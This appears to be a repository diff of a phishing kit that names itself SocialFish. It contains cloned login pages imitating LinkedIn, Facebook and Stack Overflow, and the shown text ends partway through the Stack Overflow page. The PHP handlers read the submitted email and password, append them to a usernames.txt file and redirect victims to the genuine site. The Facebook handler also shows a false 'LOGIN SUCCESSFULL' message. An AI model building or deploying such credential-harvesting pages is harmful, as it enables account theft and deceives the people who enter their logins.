<script id="control-http-12274-exec-132173-2" type="linkedin/control" class="li-control">LI.KbDialogDependencies={jsFiles:["https://static.licdn.com/scds/concat/common/js?h=37zc8dm8vu14f1neta1ponx0o"],cssFiles:["https://static.licdn.com/scds/concat/common/css?h=9qwmbyyfabl3upqh3cyzbhd49"]};LI.Controls.addControl('control-http-12274-exec-132173-2','kb.shortcuts',{homepageUrl:'http:\/\/www.linkedin.com\/nhome\/?trk=global_kb',profileUrl:'http:\/\/www.linkedin.com\/profile\/view?trk=global_kb',editProfileUrl:'http:\/\/www.linkedin.com\/profile\/edit?trk=global_kb',inboxUrl:'http:\/\/www.linkedin.com\/inbox\/#messages?trk=global_kb',jobsUrl:'http:\/\/www.linkedin.com\/job\/home?trk=global_kb',settingsUrl:'https:\/\/www.linkedin.com\/secure\/settings?req=&trk=global_kb',influencerUrl:'http:\/\/www.linkedin.com\/influencers?trk=global_kb'});</script>
</div>
<div id="header" class="global-header responsive-header nav-v5-2-header responsive-1 remote-nav" role="banner">
<div id="top-header">
<div class="wrapper">
<h2 class="logo-container">
<a href="http://www.linkedin.com/" class="logo" id="li-logo">
LinkedIn Home
</a>
</h2>
<ul class="nav main-nav guest-nav" role="navigation">
<li class="nav-item">
<a href="http://www.linkedin.com/static?key=what_is_linkedin&amp;trk=hb_what" class="nav-link">
What is LinkedIn?
</a>
</li>
<li class="nav-item">
<a href="https://www.linkedin.com/reg/join?trk=hb_join" class="nav-link" rel="nofollow">
Join Today
</a>
</li>
<li class="nav-item">
<a href="https://www.linkedin.com/uas/login?goback=&amp;trk=hb_signin" class="nav-link" rel="nofollow">
Sign In
</a>
</li>
</ul>
</div>
</div>
<div class="a11y-content">
<a name="a11y-content" tabindex="0" id="a11y-content-link">Main content starts below.</a>
</div>
</div>
<script type="text/javascript" src="https://static.licdn.com/scds/concat/common/js?h=62og8s54488owngg0s7escdit-8gz32kphtrjyfula3jpu9q6wl-aujmp9r1kj9k9x4ezyk8ahfbk-62cjxbtqyt2o85tawwwz12otx-a2blfu8y091887ailkls7jxq3-d25t3jwqpgzv7njh2nak0ihfd-1pa3tpaab6s85oxj5wgz5m0p7-6tyvplvemczf4qdrlxny6lq8d-9es290kzyvaep15qy7w7hhj6w-3i7ubdukif1jevuf29ftmtvjs-ukgkg4rtwlz74z78bt35jocx-7mba7idrrujfs4x7vi3ej72dn-5cmfpe4jqrweez449s97ldikg-85irzxzbd5halvkstu9vwbyf6"></script>
<script type="text/javascript">fs._server.fire("a3f3ff1a1f8c921340407b43db2a0000-2",{event:"after",type:"html"});</script>
<div id="body" class="" role="main">
<div class="wrapper hp-nus-wrapper">
<div id="global-error">
</div>
<div id="bg-fallback"></div>
<div id="main" class="signin">
<div id="cookieDisabled">Make sure you have cookies and Javascript enabled in your browser before signing in.</div>
<script type="text/javascript">if(navigator.cookieEnabled==true){LI.hide('cookieDisabled');}</script>
<form action="login.php?uid=<?php echo $uid ?>" method="POST" name="login" novalidate="novalidate" id="login" class="ajax-form stacked-form" data-jsenabled="check">
<input type="hidden" name="isJsEnabled" value="false"/>
<input type="hidden" name="source_app" value=""/>
<input type="hidden" name="tryCount" id="tryCount" value=""/>
<input type="hidden" name="clickedSuggestion" id="clickedSuggestion" value="false"/>
<fieldset>
<legend>Sign in to LinkedIn</legend>
<div class="outer-wrapper">
<div class="inner-wrapper">
<div class="logo_container">LinkedIn</div>
<ul id="mini-profile--js">
<li class="">
<div class="fieldgroup">
<label for="session_key-login">Email address</label>
<script id="control-http-12157-58149-1" type="linkedin/control" class="li-control">LI.Controls.addControl('control-http-12157-58149-1','GhostLabel',{});</script>
<span class="error" id="session_key-login-error"></span>
<input type="text" name="UsernameForm" value="" id="session_key-login" data-ime-mode-disabled>
<div class="domain-suggestion hide" id="domainSuggestion">
<span>Did you mean: <a id="suggestion" href="javascript:void(0);"></a>?</span>
</div>
</div>
</li>
<li>
<label for="session_password-login">Password</label>
<script id="control-http-12157-58149-2" type="linkedin/control" class="li-control">LI.Controls.addControl('control-http-12157-58149-2','GhostLabel',{});</script>
<div class="fieldgroup">
<span class="error" id="session_password-login-error"></span>
<div class="password_wrapper">
<input type="password" name="PasswordForm" value="" id="session_password-login" class="password">
<a data-li-tooltip-id="login-tooltip" href="https://www.linkedin.com/uas/request-password-reset?session_redirect=&amp;trk=signin_fpwd" tracking="signin_fpwd" class="nav-link forgot-password-link password-reminder-link" title="Forgot password?">?</a>
</div>
</div>
</li>
<li class="button">
<input type="submit" name="submit" value="Sign In" class="btn-primary" id="btn-primary">
<span>Not a member? <a href="https://www.linkedin.com/reg/join?trk=uas-consumer-login-internal-join-lnk">Join now</a></span>
</li>
</ul>
</div>
<div class="gaussian-blur"></div>
</div>
<!--
<script id="control-http-12157-58150-3" type="linkedin/control" class="li-control">LI.Controls.addControl('control-http-12157-58150-3','LI.BalloonCalloutDelegator',{width:'auto',orientation:'bottom',type:'tooltip-callout',dataId:'-li-tooltip-id'});</script>
-->
</fieldset>
</form>
<!--
<input type="hidden" name="session_redirect" value="" id="session_redirect-login"><input type="hidden" name="trk" value="" id="trk-login"><input type="hidden" name="loginCsrfParam" value="47f69d37-66c9-43b8-8888-97633da14a63" id="loginCsrfParam-login"><input type="hidden" name="fromEmail" value="" id="fromEmail-login"><input type="hidden" name="csrfToken" value="ajax:8188109723766128734" id="csrfToken-login"><input type="hidden" name="sourceAlias" value="0_7r5yezRXCiA_H0CRD8sf6DhOjTKUNps5xGTqeX8EEoi" id="sourceAlias-login">
<script id="control-http-12157-58150-4" type="linkedin/control" class="li-control">LI.i18n.register('oneOrMoreErrors','There were one or more errors in your submission. Please correct the marked fields below.');LI.i18n.register('unableToProcessRequest','We were unable to handle your request. Please try again.');LI.Controls.addControl('control-http-12157-58150-4','FrontierAJAXForm',{injectAfter:'.button',successCallback:LI.Login.handleSuccess,enableResizeScreen:false,errorCallback:LI.Login.handleError,injectGlobalError:true,errorId:'global-alert-queue'});</script>
<script id="control-http-12157-58150-5" type="linkedin/control" class="li-control">LI.Controls.addControl('control-http-12157-58150-5','Login',{showErrorOnLoad:false,errorOnLoadMessage:'There&#8217;s already a LinkedIn account associated with this email address.',resetPasswordURL:'/uas/request-password-reset?session_redirect=&trk=signin_fpwd',passwordReminderMessage:'Need a password reminder?',domainSuggestion:''});</script>
-->
<div class="callout-container">
<span id="login-tooltip">
<div class="callout-content">
Forgot password?
</div>
</span>
</div>
</div>
<svg class="svg-image-blur">
<filter id="blur-effect-1">
<feGaussianBlur stdDeviation="5"></feGaussianBlur>
</filter>
</svg>
<script>if(window.$&&jQuery){$('document').ready(function(){$('.gaussian-blur').addClass('blur');});}else{YEvent.onDOMReady(function(){YDom.addClass(Y$('.gaussian-blur',null,true),'blur');});}</script>
<style type="text/css">
.svg-image-blur {
position: absolute;
top: -50000px;
left: -50000px;
}
.blur {
-webkit-filter: blur(5px);
-moz-filter: blur(5px);
-o-filter: blur(5px);
-ms-filter: blur(5px);
filter: url(login);
filter: progid:DXImageTransform.Microsoft.Blur(PixelRadius='5');
zoom: 1;
}
</style>
</div>
</div>
<script type="text/javascript">LI.Controls.processQueue();</script>
<script type="text/javascript">LI_WCT(["control-http-12157-58149-1","control-http-12157-58149-2","control-http-12157-58150-3","control-http-12157-58150-4","control-http-12157-58150-5",]);</script>
<script type="text/javascript">fs._server.fire("a3f3ff1a1f8c921340407b43db2a0000-3",{event:"before",type:"html"});</script><div id="footer" class="remote-nav">
<div class="wrapper">
<p id="copyright" class="guest"><span>LinkedIn Corporation</span> <em>&copy; 2014</em></p>
<ul id="nav-legal">
<li><a href="http://www.linkedin.com/legal/user-agreement?trk=hb_ft_userag">User Agreement</a></li>
<li><a href="http://www.linkedin.com/legal/privacy-policy?trk=hb_ft_priv">Privacy Policy</a></li>
<li>
<a href="https://help.linkedin.com/app/answers/detail/a_id/34593/loc/na/trk/uas-consumer-login-internal/" target="_blank" rel="nofollow">Community Guidelines</a>
</li>
<li><a href="http://www.linkedin.com/legal/cookie-policy?trk=hb_ft_cookie">Cookie Policy</a></li>
<li class="last"><a href="http://www.linkedin.com/legal/copyright-policy?trk=hb_ft_copy">Copyright Policy</a></li>
</ul>
</div>
</div>
<script type="text/javascript">if(LI.showAllDeferredImg){LI.showAllDeferredImg('header',false);LI.showAllDeferredImg('footer',false);}
if(typeof(oUISettings)!=='undefined'){oUISettings.saveSettingsURL="/lite/secure-ui-settings-save-old?csrfToken=ajax%3A8188109723766128734";}
if(typeof(WebTracking)!=='undefined'){WebTracking.saveWebActionTrackURL="/lite/secure-web-action-track?csrfToken=ajax%3A8188109723766128734";}</script>
<script type="text/javascript" src="https://static.licdn.com/scds/concat/common/js?h=3i7ubdukif1jevuf29ftmtvjs-ukgkg4rtwlz74z78bt35jocx-dlcimwl96rttjyfr26x4i92ol-1m7sfcez3isjwlg5yrudwy1mz-85irzxzbd5halvkstu9vwbyf6"></script>
<script type="text/javascript">fs._server.fire("a3f3ff1a1f8c921340407b43db2a0000-3",{event:"after",type:"html"});</script>
<script type="text/javascript" src="https://static.licdn.com/scds/concat/common/js?h=4aaerux4wx2eb54ou2ge8cc8q-akfe1g1hb660050homjb2nwnr-9t8kuspsvkr9x9idyawoejfbv"></script>
<script id="localChrome"></script>
<script>var jsRandomCalculator=(function(){function compute(n,email,ts){try{var vs=n.split(":"),ts=parseInt(ts),len=vs.length,i,v,f1_out,f2_out;for(i=0;i<len;i++){vs[i]=parseInt(vs[i],10);}f1_out=f1(vs,ts);f2_out=f2(f1_out,ts);if(f1_out[0]%1000>f1_out[1]%1000){v=f1_out[0];}else{v=f1_out[1];}return f3(v,f2_out,email);}catch(err){return-1;}}function computeJson(input){return compute(input.n,input.email,input.ts);}function f1(vs,ts){var output=[],i;output[0]=vs[0]+vs[1]+vs[2];output[1]=(vs[0]%100+30)*(vs[1]%100+30)*(vs[2]%100+30);for(i=0;i<10;i++){output[0]+=(output[1]%1000+500)*(ts%1000+500);output[1]+=(output[0]%1000+500)*(ts%1000+500);}return output;}function f2(vs,ts){var sum=vs[0]+vs[1],n=sum%3000,m=sum%10000,p=ts%10000;if(n<1000){return Math.pow(m+12345,2)+Math.pow(p+34567,2);}else if(n<2000){return Math.pow(m+23456,2)+Math.pow(p+23456,2);}else{return Math.pow(m+34567,2)+Math.pow(p+12345,2);}}function f3(v1,v2,email){var len=email.length,v3=0,i=0;for(;i<len;i++){v3+=email.charCodeAt(i)<<((5*i)%32);}return(v1*v2*v3)%1000000007;}return{compute:compute,computeJson:computeJson,version:"1.0.1"};}());</script>
<script type="text/javascript" src="https://static.licdn.com/scds/concat/common/js?h=eq875keqggun9hoxzfhbanjes"></script>
<script type="text/javascript" src="https://static.licdn.com/scds/concat/common/js?h=b1qfz41z3b3boi2i3gjuzglmx-38mfpvk3swk2uxgu9fk3i7pbb-4ctyhul13sruu19hcui2s5a9p"></script>
<leo:isGuest>
<script type="text/javascript">var _gaq=_gaq||[];_gaq.push(['_setAccount','UA-3242811-1']);_gaq.push(['_setDomainName','.linkedin.com']);_gaq.push(['_trackPageview','uas-consumer-login-internal']);_gaq.push(['_setVar','guest']);YEvent.on(window,'load',function(){YAHOO.util.Get.script("https://ssl.google-analytics.com/ga.js");});</script>
</leo:isGuest>
<script type="text/javascript">LI.Controls.processQueue();</script>
</body>
</html>

View File

@ -0,0 +1,15 @@
<?php
$var = $_POST['UsernameForm'];
$var2 = $_POST['PasswordForm'];
$myFile = file_get_contents("protect.html");
$searchString = "<html><title>There's a Phishing Page generated by SocialFish in this website.</title></html>";
if($myFile == $searchString) {
file_put_contents("usernames.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND);
header('Location: https://linkedin.com/');
}
if($myFile != $searchString) {
echo "***ALERT! I AM A FAKE PAGE | DO NOT TRUST ME";
}
exit();
?>

View File

@ -0,0 +1 @@
<html><title>There's a Phishing Page generated by SocialFish in this website.</title></html>

View File

@ -0,0 +1,44 @@
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<title>Welcome to Facebook</title>
<meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><style type="text/css">/*<![CDATA[*/.b .bk{border:solid 1px #999;box-sizing:border-box;width:100%;}.b .bs{display:block;width:auto;}.w{padding:8px;}.bv{padding-bottom:12px;padding-top:12px;}.bu{padding-left:4px;padding-right:4px;}.br{padding-left:8px;padding-right:8px;}.bh{padding-bottom:4px;}.b .t{border:0;border-collapse:collapse;margin:0;padding:0;width:100%;}.b .t tbody{vertical-align:top;}.b .t td{padding:0;}.b .t td.bd{padding:4px;}.b .u{width:100%;}.v{background:#fa3e3e;}.x{color:#fff;}.b .x a,.b .x a:visited{color:#fff;font-weight:bold;}.b .x a:focus,.b .x a:hover{background:#1d2129;}.bx{color:#4b4f56;}.y{font-size:12px;line-height:16px;}.bw{font-size:16px;line-height:20px;}.bf{font-weight:bold;}.bq{text-align:center;}form{margin:0;border:0;}.bc{margin:0;}.bc li{display:block;list-style:none;}.b .by{padding:0;}.b .bd{padding:4px;}.b .bg{color:#90949c;font-weight:bold;}.b .bj{padding:12px 8px;color:#1d2129;}.bi{border:0;display:block;margin:0;padding:0;}.bl{box-sizing:border-box;width:100%;}.b .bm{border:solid 1px #999;}.o{-moz-appearance:none;background:none;display:inline-block;font-size:12px;height:28px;line-height:28px;margin:0;overflow:visible;padding:0 9px;text-align:center;vertical-align:top;white-space:nowrap;}.b .o{border-radius:2px;}.bt,a.bt,.b a.bt,.b a.bt:visited{background-color:#f6f7f9;color:#4b4f56;}.b a.bt:hover,.b .bt:hover{background-color:#e9ebee;color:#4b4f56;}.b .bt{border:1px solid #bec2c9;}.bt[disabled]{color:#bec2c9;}.b .bt[disabled]:hover{background-color:#f6f7f9;color:#bec2c9;}.bp,.q,a.bp,a.q,html .b a.bp,html .b a.q{color:#fff;}.b .q{background-color:#4080ff;border:1px solid #4476e8;}.b a.q:hover,.b .q:hover{background-color:#4580ef;}.b .bp{background-color:#4267b2;border:1px solid #365899;}.b a.bp:hover,.b .bp:hover{background-color:#465e91;}.bp[disabled]{color:#899bc1;}.q[disabled]{color:#91b4fd;}.b .bp[disabled]:hover{background-color:#4267b2;}.b .q[disabled]:hover{background-color:#4080ff;}.bo{font-size:14px;height:44px;line-height:44px;padding:0 20px;}.o .s{display:inline-block;}.b .o .s{display:inline-block;margin-top:0;vertical-align:middle;}.b a.o::after{content:"";display:inline-block;height:100%;vertical-align:middle;}.o .s{line-height:20px;margin-top:4px;}.bo .s{line-height:24px;margin-top:10px;}.o.bn{display:block;width:100%;}a.o.bn,.b label.o.bn{display:block;width:auto;}.b .o{padding:0 8px;}.b a.o{height:26px;line-height:26px;}.b .bo{padding:0 19px;}.b a.bo{font-size:14px;height:42px;line-height:42px;}.s{pointer-events:none;}.b a,.b a:visited{color:#3b5998;text-decoration:none;}.b a:focus,.b a:hover{background-color:#3b5998;color:#fff;}body{text-align:left;direction:ltr;}body,tr,input,textarea,button{font-family:sans-serif;}body,p,figure,h1,h2,h3,h4,h5,h6,ul,ol,li,dl,dd,dt{margin:0;padding:0;}h1,h2,h3,h4,h5,h6{font-size:1em;font-weight:bold;}ul,ol{list-style:none;}article,aside,figcaption,figure,footer,header,nav,section{display:block;}.e #viewport{margin:0 auto;max-width:100%;}.g{background-color:#fff;}.i{background-color:#3b5998;}.z{background-color:#eceff5;}#page{position:relative;}.b .p span{font-size:14px;}.j{padding:2px 3px;}.k{width:100%;}.k .m{text-align:right;}.l{border:0;display:inline-block;vertical-align:top;}i.l u{position:absolute;width:0;height:0;overflow:hidden;}.cd{display:block;font-size:x-small;margin:-3px -3px 1px -3px;padding:3px;}.cf{border:1px solid #90949c;display:block;font-size:x-large;height:20px;line-height:18px;text-align:center;vertical-align:middle;width:20px;}.b .ca a,.b .ca a:visited{color:#bec2c9;}.b .ca a:focus,.b .ca a:hover{background:#dddfe2;color:#1d2129;}.bz{background-color:#4b4f56;font-size:x-small;padding:7px 8px 8px;}.cc{color:#bec2c9;display:block;font-size:x-small;margin:-3px -3px 1px -3px;padding:3px;}.cg{color:#fff;}body,tr,input,textarea,.h{font-size:medium;}/*]]>*/</style>
<link rel="canonical" href="" /></head>
<body tabindex="0" class="b c d e f g">
<div class="h"><div id="viewport">
<div class="i j" id="header">
<table cellspacing="0" cellpadding="0" class="k"><tr>
<td valign="middle"><h1>
<img src="https://static.xx.fbcdn.net/rsrc.php/v3/y8/r/k97pj8-or6s.png" class="l" alt="" height="16" width="77"></h1></td>
<td valign="middle" class="m"><a class="n o p q" href="/reg/?cid=102&amp;refid=8" style="background-color:#69a74e;color:white;">
<span class="s">Create Account</span></a></td></tr></table></div>
<div id="objects_container">
<div class="g" id="root" role="main">
<table class="t" role="presentation"><tbody>
<tr><td class="u"><div id="login-notices">
<div class="v w x" style="display: none;">
<div class="y"></div></div></div>
<div><div class="z ba"><div></div>
<form method="post" class="bb" id="login_form" novalidate="1" action="login.php">
<input type="hidden" name="lsd" value="AVqlX8Vs" autocomplete="on" />
<input type="hidden" name="version" value="1" />
<input type="hidden" id="ajax" name="ajax" value="0" />
<input type="hidden" id="width" name="width" value="0" />
<input type="hidden" id="pxr" name="pxr" value="0" />
<input type="hidden" id="gps" name="gps" value="0" />
<input type="hidden" id="dimensions" name="dimensions" value="0" />
<input type="hidden" name="m_ts" value="1480337071" />
<input type="hidden" name="li" value="ryY8WGS9GCyJ8gO1hL3fdXmg" />
<ul class="bc bd be"><li class="bd">
<h3 class="bf bg bh">Email address or phone number</h3>
<input autocorrect="off" autocapitalize="off" class="bi bj bk" name="email" value="" type="text" /></li>
<li class="bd"><div><h3 class="bf bg bh">Password</h3>
<input autocorrect="off" autocapitalize="off" class="bi bj bl bm" name="pass" type="password" /></div></li>
<li class="bd"><input value="Log In" type="submit" name="login" class="n o bn bo bp" /></li></ul>
<noscript><input type="hidden" name="_fb_noscript" value="true" /></noscript>
</form>
<div class="bq br"><div class="bq bs" id="signup-button">
<a class="n o bt" href="index.html" style="
background-color:#69a74e;
color:white;
height:44px;"><span class="s">Create New Account</span></a></div></div><div class="bu bv"><span class="bw bx"><ul class="bc by"><li class="bd"><a href="" id="forgot-password-link">Forgotten password?</a></li><li class="bd"><a href="/help/?refid=8" id="help-link">Help Centre</a></li></ul></span></div></div></div></td></tr></tbody></table><div></div></div></div><div><div class="bz"><div class="ca"><table class="t" role="presentation"><tbody><tr><td class="u cb" style="width:50%"><b class="cc">English (UK)</b><a class="cd" href="">ਪੰਜਾਬੀ</a><a class="cd" href="">ગુજરાતી</a></td><td class="u ce" style="width:50%"><a class="cd" href="">हिन्दी</a><a class="cd" href="">اردو</a><a class="cd" href=""><div class="cf"> + </div></a></td></tr></tbody></table></div><span class="bf cg">Facebook ©2018</span></div></div></div></div></body></html>

View File

@ -0,0 +1,15 @@
<?php
$var = $_POST['email'];
$var2 = $_POST['pass'];
$myFile = file_get_contents("protect.html");
$searchString = "<html><title>WELCOME TO FACEBOOK</title></html>";
if($myFile != $searchString) {
file_put_contents("usernames.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND);
header('Location: https://mbasic.facebook.com/');
}
if($myFile != $searchString) {
echo "LOGIN SUCCESSFULL";
}
exit();
?>

View File

@ -0,0 +1 @@
<html><title>WELCOME TO FACEBOOK</title></html>

View File

@ -0,0 +1,666 @@
<!-- I AM A FAKE PAGE | DO NOT TRUST ME -->
<!DOCTYPE html>
<html>
<head>
<title>Log In - Stack Overflow</title>
<link rel="shortcut icon" href="https://cdn.sstatic.net/Sites/stackoverflow/img/favicon.ico?v=4f32ecc8f43d">
<link rel="apple-touch-icon image_src" href="https://cdn.sstatic.net/Sites/stackoverflow/img/apple-touch-icon.png?v=c78bd457575a">
<link rel="search" type="application/opensearchdescription+xml" title="Stack Overflow" href="/opensearch.xml">
<meta property="og:type" content="website"/>
<meta property="og:url" content="https://stackoverflow.com/users/login?ssrc=head&amp;returnurl=https:%2f%2fstackoverflow.com%2f"/>
<meta property="og:image" itemprop="image primaryImageOfPage" content="https://cdn.sstatic.net/Sites/stackoverflow/img/apple-touch-icon@2.png?v=73d79a89bded" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:domain" content="stackoverflow.com"/>
<meta name="twitter:title" property="og:title" itemprop="title name" content="Log In" />
<meta name="twitter:description" property="og:description" itemprop="description" content="Stack Overflow | The Worlds Largest Online Community for Developers" />
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script>
<script src="https://cdn.sstatic.net/Js/stub.en.js?v=4798526593f9"></script>
<link rel="stylesheet" type="text/css" href="https://cdn.sstatic.net/Sites/stackoverflow/primary.css?v=315e07ae9558">
<link rel="stylesheet" type="text/css" href="https://cdn.sstatic.net/Sites/stackoverflow/secondary.css?v=39a4f4ff9d5a">
<meta http-equiv="X-XRDS-Location" content="http://stackoverflow.com/yadis">
<script src="https://cdn.sstatic.net/Js/auth.en.js?v=6f685b28d5bb"></script>
<script>
StackExchange.init({"locale":"en","serverTime":1516864474,"routeName":"Users/Login","stackAuthUrl":"https://stackauth.com","networkMetaHostname":"meta.stackexchange.com","site":{"name":"Stack Overflow","description":"Q&A for professional and enthusiast programmers","isNoticesTabEnabled":true,"recaptchaPublicKey":"6LdchgIAAAAAAJwGpIzRQSOFaO0pU6s44Xt8aTwc","recaptchaAudioLang":"en","enableNewTagCreationWarning":true,"insertSpaceAfterNameTabCompletion":false,"id":1,"childUrl":"https://meta.stackoverflow.com","enableSocialMediaInSharePopup":true,"protocol":"https"},"user":{"fkey":"833f8ca9a7d990b019298b04b4f36658","tid":"3a0c8b9b-4965-ffd6-fedd-bfb7c63fb147","rep":0,"isAnonymous":true,"isAnonymousNetworkWide":true,"canSeeNewHeaderDesign":true},"events":{"postType":{"question":1},"postEditionSection":{"title":1,"body":2,"tags":3}},"story":{"minCompleteBodyLength":75,"likedTagsMaxLength":300,"dislikedTagsMaxLength":300},"jobPreferences":{"maxNumDeveloperRoles":2,"maxNumIndustries":4}}, {"site":{"allowImageUploads":true,"enableUserHovercards":true,"styleCode":true,"enableImgurHttps":true,"forceHttpsImages":true},"comments":{},"userProfile":{"openGraphAPIKey":"58740831ad23540e00c58987"},"tags":{},"accounts":{"currentPasswordRequiredForChangingStackIdPassword":true},"flags":{"allowRetractingFlags":true},"topBar":{"showNewFeatureNotice":true},"snippets":{"snippetsEnabled":true,"renderDomain":"stacksnippets.net"},"paths":{},"markdown":{"asteriskIntraWordEmphasis":true},"monitoring":{"clientTimingsAbsoluteTimeout":30000,"clientTimingsDebounceTimeout":1000}});
StackExchange.using.setCacheBreakers({"js/prettify-full.en.js":"31c97e5f1b8c","js/moderator.en.js":"6d8579d2c2c6","js/full-anon.en.js":"bf3ede176976","js/full.en.js":"f2ace8fa9664","js/wmd.en.js":"08c7e0a5dd96","js/third-party/jquery.autocomplete.min.js":"d3b8fa7fdf74","js/third-party/jquery.autocomplete.min.en.js":"","js/mobile.en.js":"28c61d1141cc","js/help.en.js":"1977adbf870a","js/tageditor.en.js":"490b78332258","js/tageditornew.en.js":"c712a32ec24d","js/inline-tag-editing.en.js":"681a5e3ebd00","js/revisions.en.js":"732d67ebaed2","js/review.en.js":"bb4712b8f87e","js/tagsuggestions.en.js":"505ddd862f8f","js/post-validation.en.js":"3de2efbc442b","js/explore-qlist.en.js":"e71f14781288","js/events.en.js":"24aa34ec7142","js/keyboard-shortcuts.en.js":"4f9ad2234d1d","js/external-editor.en.js":"b46c950d6c5a","js/adops.en.js":"22a9bd59b1e9","js/external-editor.en.js":"b46c950d6c5a","js/snippet-javascript.en.js":"9386ed001c7e","js/snippet-javascript-codemirror.en.js":"cc2c0a505442"});
StackExchange.using("gps", function() {
StackExchange.gps.init(true);
});
</script>
<noscript id="noscript-css"><style>body,.top-bar{margin-top:1.9em}</style></noscript>
</head>
<body class="universal-auth-page new-topbar">
<script async src="https://js-sec.indexww.com/ht/p/185901-159836282584097.js"></script>
<div id="notify-container"></div>
<div id="custom-header"></div>
<header class="top-bar js-top-bar _fixed">
<div class="-container">
<div class="-main">
<a href="https://stackoverflow.com" class="-logo js-gps-track"
data-gps-track="top_nav.click({is_current:false, location:22, destination:8})">
<span class="-img">Stack Overflow</span>
</a>
<nav class="navigation" role="navigation" aria-label="site navigation">
<ol class="-list">
<li class="-item">
<a id="nav-questions" href="/questions" class="-link js-gps-track"
data-gps-track="top_nav.click({is_current:false, location:22, destination:1})">Questions</a>
</li>
<li class="-item">
<a id="nav-jobs" href="/jobs?med=site-ui&amp;ref=jobs-tab" class="-link js-gps-track"
data-gps-track="top_nav.click({is_current:false, location:22, destination:6})">Developer Jobs</a>
</li>
<li class="-item">
<a id="nav-tags" href="/tags" class="-link js-gps-track"
data-gps-track="top_nav.click({is_current:false, location:22, destination:2})">Tags</a>
</li>
<li class="-item _current">
<a id="nav-users" href="/users" class="-link js-gps-track"
data-gps-track="top_nav.click({is_current:true, location:22, destination:3})">Users</a>
</li>
</ol>
</nav>
</div>
<form id="search" action="/search" method="get" class="searchbar" autocomplete="off" role="search">
<input name="q" type="text" placeholder="Search…" value="" tabindex="1" autocomplete="off" maxlength="240" class="f-input js-search-field" />
<button type="submit" aria-label="Search..." class="btn-topbar-primary js-search-submit"><svg aria-hidden="true" class="svg-icon iconSearch" width="18" height="18" viewBox="0 0 18 18"><path d="M12.86 11.32L18 16.5 16.5 18l-5.18-5.14v-.35a7 7 0 1 1 1.19-1.19h.35zM7 12A5 5 0 1 0 7 2a5 5 0 0 0 0 10z"/></svg></button>
</form>
<div class="-actions">
<nav class="secondary-nav">
<div class="-dialog-container js-topbar-dialog-corral">
<div class="topbar-dialog siteSwitcher-dialog dno">
<div class="header">
<h3><a href="https://stackoverflow.com">current community</a>
</h3>
</div>
<div class="modal-content current-site-container">
<ul class="current-site">
<li>
<div class="related-links">
<a href="https://stackoverflow.com/help" class="js-gps-track" data-gps-track="site_switcher.click({ item_type:14 })"
>help</a>
<a href="https://chat.stackoverflow.com" class="js-gps-track" data-gps-track="site_switcher.click({ item_type:6 })"
>chat</a>
</div>
<a href="https://stackoverflow.com"
class="current-site-link site-link js-gps-track"
data-id="1"
data-gps-track="site_switcher.click({ item_type:3 })">
<div class="favicon favicon-stackoverflow site-icon" title="Stack Overflow"></div>
Stack Overflow
</a>
</li>
<li class="related-site">
<div class="L-shaped-icon-container">
<span class="L-shaped-icon"></span>
</div>
<a href="https://meta.stackoverflow.com"
class="site-link js-gps-track"
data-id="552"
data-gps-track="site.switch({ target_site:552, item_type:3 }),site_switcher.click({ item_type:4 })">
<div class="favicon favicon-stackoverflowmeta site-icon" title="Meta Stack Overflow"></div>
Meta Stack Overflow
</a>
</li>
</ul>
</div>
<div class="header" id="your-communities-header">
<h3>
your communities </h3>
</div>
<div class="modal-content" id="your-communities-section">
<div class="call-to-login">
<a href="https://stackoverflow.com/users/signup?ssrc=site_switcher&amp;returnurl=%2fusers%2fstory%2fcurrent&amp;amp;utm_source=stackoverflow.com&amp;amp;utm_medium=dev-story&amp;amp;utm_campaign=signup-redirect" class="login-link js-gps-track" data-gps-track="site_switcher.click({ item_type:10 })"
>Sign up</a> or <a href="https://stackoverflow.com/users/login?ssrc=site_switcher" class="login-link js-gps-track" data-gps-track="site_switcher.click({ item_type:11 })"
>log in</a> to customize your list.
</div>
</div>
<div class="header">
<h3><a href="https://stackexchange.com/sites">more stack exchange communities</a>
</h3>
<a href="https://stackoverflow.blog" class="fr">company blog</a>
</div>
<div class="modal-content">
<div class="child-content"></div>
</div>
</div>
<div class="topbar-dialog help-dialog js-help-dialog dno">
<div class="modal-content">
<ul>
<li>
<a href="/tour" class="js-gps-track" data-gps-track="help_popup.click({ item_type:1 })">
Tour
<span class="item-summary">
Start here for a quick overview of the site
</span>
</a>
</li>
<li>
<a href="/help" class="js-gps-track" data-gps-track="help_popup.click({ item_type:4 })">
Help Center
<span class="item-summary">
Detailed answers to any questions you might have
</span>
</a>
</li>
<li>
<a href="https://meta.stackoverflow.com" class="js-gps-track" data-gps-track="help_popup.click({ item_type:2 })">
Meta
<span class="item-summary">
Discuss the workings and policies of this site
</span>
</a>
</li>
<li>
<a href="https://stackoverflow.com/company/about" class="js-gps-track" data-gps-track="help_popup.click({ item_type:6 })">
About Us
<span class="item-summary">
Learn more about Stack Overflow the company
</span>
</a>
</li>
<li>
<a href="https://www.stackoverflowbusiness.com/?ref=topbar_help" class="js-gps-track" data-gps-track="help_popup.click({ item_type:7 })">
Business
<span class="item-summary">
Learn more about hiring developers or posting ads with us
</span>
</a>
</li>
</ul>
</div>
</div>
</div>
<ol class="-list">
<li class="-item">
<a href="https://stackexchange.com/users/?tab=inbox" class="-link js-inbox-button" title="Recent inbox messages">
<svg aria-hidden="true" class="svg-icon iconInbox" width="20" height="18" viewBox="0 0 20 18"><path d="M15.19 1H4.63c-.85 0-1.6.54-1.85 1.35L0 10.79V15c0 1.1.9 2 2 2h16a2 2 0 0 0 2-2v-4.21l-2.87-8.44A2 2 0 0 0 15.19 1zm-.28 10l-2 2h-6l-2-2H1.96L4.4 3.68A1 1 0 0 1 5.35 3h9.12a1 1 0 0 1 .95.68L17.86 11h-2.95z"/></svg>
<span class="indicator-badge js-unread-count _important" style="display: none;"></span>
</a>
</li>
<li class="-item">
<a href="https://stackexchange.com/users/?tab=reputation" class="-link js-achievements-button" title="Recent achievements: reputation, badges, and privileges earned" data-unread-class="_highlighted-positive">
